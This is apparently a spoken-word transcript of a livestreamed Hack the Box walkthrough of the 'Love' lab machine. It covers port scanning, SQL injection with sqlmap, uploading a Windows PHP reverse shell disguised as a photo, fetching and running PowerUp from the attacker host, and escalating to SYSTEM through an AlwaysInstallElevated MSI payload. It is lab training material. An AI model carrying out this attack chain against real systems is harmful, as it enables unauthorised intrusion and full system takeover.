back on Hack the Box with Love. And we're going to go ahead and let's go ahead and send off an mmap scan at that guy like right there. And looks like we got quite a few things up. This is more ports than we've been seeing lately, so that's exciting. mmap tac P, let's do 445. That's CSV. We'll do that for 239 there. Let's go ahead and do a... We got 3306 up. Let's go ahead and mmap that, because that should be MySQL. Should not be pointing toward the internet like it is. And we also have port 80. Let's go ahead and mmap that. And then let's go ahead and check out port 80. It looks like it's not enabled, not required, so it's disabled. Looks like we might be able to get into that. SMB client, TAC L. Let's go ahead and try to get into there like real quick before we check out that port 80. Let's say we're running an Apache server on a Windows machine here. So it's a little bit different. It doesn't look like we're running an IIS server, and we're not able to get in there. Access denied. Okay. Message sign is disabled. The default was Windows 10 Pro, so we're not doing anything with Eternal Blue or anything like that. We do have MySQL. But we're not allowed to connect to it with our server like right there, with who we're on like right now. That's okay. But yeah, we'll just keep on looking this guy up, keep on doing different things, and we'll go from there. Alright, let's go ahead and check out that port 80. So exit out of a lot of this stuff, because we have a lot of stuff up like right now. Haven't really exited out of anything from what we've been doing lately. Alright, let's check out that port 80 like right there. Voting system PHP, huh? Let's see, using PHP. Let's see if there's something actually called for voting system. Search exploit, voting system. If it's the Florida one, then we should be pretty good. Voting system, let's go. Alright, we don't know what version this is or anything like that yet. But if it's the Florida one, I know it was like a 12-year-old hacked it or something like that during DEF CON. Plugins, I checked min.js, okay. Login. Let's go ahead and let's throw an SQL map at it. And let's see if we can do something with that. Let's freaking go. We got quite a few things for this guy. Let's also try to log in with maybe admin. It says voter's ID, so we're probably not going to be able to do that with voter ID. Prepare for the OSCP. Yeah, if you watch that YouTube channel like right there, there's a lot of different Active Directory stuff on there. From what Nightbot just shot out up there. A lot of Active Directory stuff. And also my notes are also on GitHub too. So if you look on GitHub for Overgrown Carrot 1, look at notes. I just put them up there. I'm going to put them up again probably Tuesday or Wednesday or something like that. We're going to throw up some more notes on there. And yeah, there's a bunch of Active Directory notes on there also. So if we go to my notes, all this stuff is all for Active Directory. And different stuff, you know, do with it, then some exploits, stuff like that. So voter is vulnerable. Okay, do you want to exploit this SQL injection? Of course I do. So I'll exploit it that way, but since we got someone that's going through OSCP in the chat, let's go ahead and also exploit it through voting system. We got remote code execution authenticated, authentication bypass. Let's go ahead and read this like right here. Let's see what it says. Search exploit tac M because he cannot use SQL map. So we did pull some stuff down there. Let's go ahead and do a tac DBMS equals MySQL. All right. MySQL. And we want to look for tac-DBS. We want to look for what the database names are. It's time-based blind injection. Okay. Let's go ahead and do a nano on 4.9. You can simply bypass the admin login page with the following SQL injection. All you need is a bcrypt hash that is equal with your random password. Your username should not match with an existing username. Okay. Well, we're looking for voter ID. He's coming back down. He's getting voter IDs like right now, it looks like. So he threw that into it, obviously, and got some credentials out of that. And then he did something like this, like right here. Wonder if we could actually just throw that in there if that would work. I'd be really, really surprised. Probably not. Yeah, that's what I thought. Alright. We also had some, a lot of stuff on here. Whoops. We also had some remote code execution. Because, is it time-based blind? Yeah, that's going to be super hard to actually just exploit by itself. But Obsidian? Yep. Obsidian's very good. Obsidian is. Alright, so we do have the time-based. That's the text one. We just looked at that. Remote code authentication, unauthenticated. Text file authenticated remote code execution. And then we have some other stuff up here. Authentication bypass. A lot of text files here. We do have this authentication bypass like right here. I wonder if online voting system is the same as this guy. Let's go ahead and try it. He's still doing his thing down here. He's looking up different stuff, so we'll let him go. And let's go ahead and see what this guy's all about. Flaw in the profile section of online voice system laws. An unauthenticated user is set an arbitrary password for account to register in the application. Reset the password of a user just knowing his ID. See, we don't know. Well, it's probably going to be 1. Admin's probably going to be 1, and he's going to overwrite to admin. Overwrite the password of the victim. Did he just make an arbitrary password? Or could we just say admin? So it's going to be admin. And then the voter ID is 1. I really want admin. Target site. Go and throw the rest of this in there. See this round though? This one's going to work right here. I also didn't see if it was Python 2 or 3. Alright, it's not either one. Okay. So let's go ahead and nano him again. And it looked like there's a problem somewhere over here. Let's go ahead and invalid URL. Why is that an invalid URL? Still coming up with database names down here. Is it, do I have to actually feed it URL or something like that? I wonder. No. Because we just put the URL in there, didn't we? Yeah, we put the target site in there. Huh. That one may also not work for that guy. We don't know yet. That one may not work for that guy yet. We may also not even be in the right place, honestly, because there's more ports that are open over here. We have 5,000. We do have WinRM up and running, so we got some stuff here. No Kerberos, nothing like that. So I say we just let SQL map do its thing. And we'll see what happens here. See if we get anywhere with it. We do have 443 up and running and port 80. Just want to check out the mmap for port 443. That's weird. Are we on 239 here? Yep. Let's go and check that out. Not that. TAC SC, TAC SV. Go ahead and see if we can see those certificates. There might be some other stuff in there. And we also have port 5000, which I thought was weird. We do have other stuff in there. Okay, so we have a 443 has a staging.love.htb. Okay. Sudo nano etsy host. Staging.love.htb. Port 5000 is another patchy one. That's www.love. Let's go and check out that staging.love. Maybe that's a rabbit hole. Staging.love.htb. Really? Sign up today. Huh. We got a scan file. So he just scanned itself. Vote admin creds. Admin at love is in the air. You're kidding with me, right? Let's freaking go. So that's for port 5000. I'm going to go with port 5000. Just got to be talking back to this guy. Or let's just go to www.love.htb. It was admin and then whatever that was, right? See, that's not a voter registration, though. But we did definitely grab something there. I wonder if it's just one. I wonder if admin is one. So we just grabbed the stuff from port 5000 that was also HTTP, and we didn't know what the hell it was. Let's try going to port 5000, I guess. Staging. We don't know what the hell port 5000 is yet, though, do we? It's www.love.htb, which brings us here. I wonder if there's another place to log in at. There's got to be another login page for that. That is hilarious. I did not see that one coming. www.love.htb. Let's keep working on this guy also. We got /admin. That might be something. I want to go ahead and I just want to tech DBS. Tech D is going to be vote system, I'm thinking. Tech dump. Let's do a table just in case there's like 1,000 things in there. Might have a problem with this guy running and this guy at the same time. So let's go ahead and let's try to go to that /admin page maybe. Okay, admin. Then that. Let's go! Alright, so we're now in the voting system, so who cares about the SQL map? There's no voters in here anyways. Position, candidates, nobody, ballot position, election title, dashboard, now I'm wondering, can we like update the picture? Yeah, photo, browse. Can we just create a reverse shell, I'm wondering, with that photo? I'm thinking we can try something like that. Or we may be able to like put someone in, but I'm thinking let's try to first or if we can upload anything into here. Because it says it's .php, right? So I'm wondering is if can we voters list. They also have a photo that we can browse for. Or if we could just do that photo, but I wonder where it would actually go after that. Let's go ahead and try to put a PHP file as a photo. Let's go ahead and CD tools. Let's go ahead and cat shell.php. Oh, we got the nano it because it's for try hacking like right now. Nano shell.php. This Let's try something like that. And let's go ahead and do an ifconfig. I wonder if we can put it in for our images and get a reverse shell off of this thing. Because it's running PHP. So it should be the same exact thing that we usually do with... no, because we're going to call for a bin. And we got to call for like a command shell, right? We want to call back for command.exe, not a bin, because it's going to be a Windows machine. Hey, thanks a lot, Debbie Dabs. You know what we can do? I know I have another one. I know I have, there's something out here. I forget what the hell it's called, but let's look at a Windows PHP reverse shell. Ivans is a badass. This guy's is great. It's just like a reverse shell for everything. Reverse. PHP shell. This one like right here. It's just, it works. We put our IP address down there. I wonder, do I have Ivans in here? Okay, let's go ahead and do a nano Ivan. Or let's do a Windows PHP shell. Rev shell. Hey, thanks a lot for the follow, MDP. Alright, and let's go ahead and put in our IP address up here. 10.10.14.21 on port 4444. Now this one should be used for Windows, like right here. So let's go ahead and I guess we'll try to upload that into an image maybe. I wonder if it's going to say no. Let's go to Hack the Box. Let's go to, I don't remember what the hell this one was even called. Love. And let's go to the, oh no, I gotta go to my tools, I'm sorry. Tools. And it is a Win reverse shell, right? Win PHP reverse shell. Can I do that? Now, if I create a netcat listener, did we do it on port 4444? I don't remember. Yep. So let's go ahead and create a netcat listener for port 4444. What if I just get a shell down here? What is it? Tac. Oh man, how do you get a shell in SQL map? OS shell. Let's do that. See if I can get a shell down there. Let's go ahead and try to go to our photo here. I don't know where that photo would even be at though, now I think about it. Open image in new tab. Let's go! We got a reverse shell. Alright, so who am I? /priv. Not really too many privileges. Who am I? /groups. Groups are looking pretty normal. Got Facebook profile image, index, PR web shell, and then index HTML.text. Nothing in it. CD and a Phoebe. Desktop. Can we read the user.text? Yes, we can. Okay, so we got somewhere. We can read user.text file. Cool. Let's go. That was like a 4 because I didn't think that port 5000. We just kind of just threw something at it. Was just started laughing at it. All right. Command key list. See if anyone else's credentials are on here. Okay, no currently stored credentials. Okay. System info. Looks like it's had a lot of patches. And it's a Windows 10, we believe. It's Windows 10, it's had a lot of its hotfixes here. So, can I CD in the administrator? Nope, okay. Alright, so now these guys kind of start to figure out what to do next. We can try to upload WinPs, or we can just keep messing around with stuff and try to figure out different things, right? So, but we do have a reverse shell now. So that's good. I guess we can go ahead and upload WinPs. That's what I'm thinking. Can we get into PowerShell from here? We can always get that reverse shell back. Okay, we can quickly too. That's nice. All right, let's try to do a power up maybe. Let's do a IEX, IWR, use basic parsing. HTTP 1010. I think I remember now by now 14.21 / powerup.ps1. Okay, invoke all checks. Oh, what's that? All logon credentials, and that's for Phoebe. Supposedly does have all login credentials. And always install elevated. Is that running on this thing? How do we check for that again? I think I have somewhere in here for always install elevated. Do I? It should be under groups. Nope, privs. Do I have always install elevated on here? We'll put it in exploits, but. Supposedly Phoebe has her credentials on there. It's saying. But we're not getting anything back. And whenever we looked up auto logon credentials, we didn't see anything. And usually if they do have their credentials as auto logon, we'll see it like right there. That's not going to matter because that's... Oh, no, that's for Phoebe. For a hijackable DLL location. We would have to somehow restart that service. We might have always install elevated on here, which then would allow us to install an MSI file, thus allowing us to get privs, right? So, hey, thanks a lot for follow. Oh, Q hair. Let's go ahead and do that. We can just write user add MSI. Access to path is denied for CC users. Okay, never mind. Let's go ahead and CD into ctemp if it exists. Nope, make directory ctemp. CD into ctemp. Right, user add MSI. Okay, so now we need to run that thing, right? But we need to run it because we don't have... Let's just go ahead and do a little thing like right here. So we upload power up, right? Into memory. Okay, we didn't have an AMSI bypass on there. We didn't have anything. We get checking for always install elevated registry keys. Supposedly we have always install elevated. We did a write user add MSI, right? Hey, thanks a lot for follow, Yertle. So we did that, right? Write user add MSI, okay? Now from here, we have to run this file, this user add MSI, but since we are within a reverse shell there, we're not under remote desktop, right? So we have to do it as a quiet, then we have to do QN, so we have to do a run, user add MSI, /quiet, /QN, and I think it's tac I. I'm pretty sure it's /I. And that's not how we do it. No. Run MSI exec. MSI exec quiet QN, because if not, then it'll open up another thing that's saying, hey, do you want to run this file? Now let's go ahead and put in the full. I thought it was run. Oh, you know what? That might be in command prompt. That's why. That might be in command prompt. I thought it was run. Is it just MSI exec, I wonder? Might just be MSI execute. Okay. So it probably just opened up and said, do you want to run this? And then we have to figure out how the hell we're going to say yes to that. Crap. Now, that's if that even works. There's other ways to be able to do this. Summarize all things we just did. All right, so we found a web server with the voting system, right? From there, we saw other web servers that were up and running. Okay? We saw... Fuck, I didn't think it'd be coming through here. That's crazy. We saw a port 5000. All right, that was up and running. Let me go ahead and scroll up. So we saw the web server was up and running. We went to port 80, saw that was vulnerable to SQL injection, which it was. But there wasn't really anything on there, right? We also saw there was port 443, which is a little bit strange. So we took a Nmap scan of that, and we saw that there was, in the certificate, that there was some other vhosts that we could go to. So we put those in our Etsy host, went to those vhosts, and I saw this port 5000. We went ahead and we looked at that guy, like right there, at port 5000. Port 5000, if we go there again, because this one's pretty hilarious, actually. What was it? It was www.love.htb 5000. Was that what it was? No, what was it? It was something.htb. I forgot exactly where we went to. I found that Nmap scan for it. There we go. No, that's the Mariah database. I don't know if anyone else remembers. But we went to there. It's something on port 443. I don't remember exactly what the site was called. But we went to there. Actually, is this port 5000 right here? No, this is staging.love. Let's try staging.love.htb. That gave us a forbidden that time. Might be HTTPS. We went to port 5000 and we were able to... No, that was forbidden. That's 443, like right there. But yeah, once port 5000, we were able to actually see our own... No. 5000 was forbidden, excuse me. We went to another web server that was up and running on port... Or was it just staging? Was it just the staging? Staging.love.htb. And then we went to demo and we did a 127.0.0.1 for port 5000. And it gave us the credentials. We then logged in to our voting system. That was the credentials for the voting system. We logged into here. And from there, we then put a reverse shell as a photo. Just a PHP reverse shell for Windows. We are running PHP, but it had to be for Windows. We ran that, got our callback, and now what we're trying to do is we saw that this is vulnerable to and always install elevated. So we have always install elevated here. So now what we're about to do is make an MSF Venom file, and it's going to be attack MSI, and we're going to call it shell.msi. Because they didn't seem to want to add that user in there, the user add thing. It usually works. They just seem to want to add that. Now with that user add one though, it may actually be hidden, the user. But it just doesn't see. We'll go ahead and we'll do this. We'll see if we can get a callback. So if we have always still elevated, then we can go ahead and we can utilize that MSI file. It'll install it, and then we do our little quiet thing because it's good to try to actually open it up and say, do you want to run this? Well, yes, we do, but we don't want you to actually open up and do all that stuff. So let's go ahead and do a use exploit multi-handler because we don't have... Is 3389 open, actually? So 3389 is open, then we're golden. No. Okay. It's usually not in Hack the Box. Use exploit multi-handler. Set the payload to Windows x64. We know that's x64 because we already did a system info. Interpreter. Reverse TCP. Set our L host to ourselves. Set our L ports 4444. Let's go ahead and run that. And let's go ahead and do a wget HTTP. Uh, 10.10.14.21 / shell.msi. Our file will be shell.msi. Oh, PowerShell. We'll go and we'll copy that again. And now we should be able to run MSI execute all of this, and then we're going to run shell.msi. And hopefully that gives us callback, which it is. Let's go! There we go. All right, let's go ahead and take some notes of this that I just did like right there. Copy that. Go ahead and we'll show that we got over here. Then we execute it. And we get a callback over here. Let me go ahead and copy this command like right here. And we get a callback over here. And I'm NT Authority System because we have always installed Elevated up and running on here. Hey, thanks a lot for the follow, Wild Agger. Thank you very much. All right, and we have our always install Elevated. We are NT Authority System. Whoopsie daisy. That's not what I want to do. Whoa, whoa, whoa. There we go. All right. So now we can go ahead and we get into a shell. CD into C users administrator desktop. And go ahead and type out that root.txt. Let's freaking go. I don't know if I even grabbed the other one yet. Yep, we already grabbed the other one. Let's go. All right, cool. So that was love on Hack the Box. That was a fun one.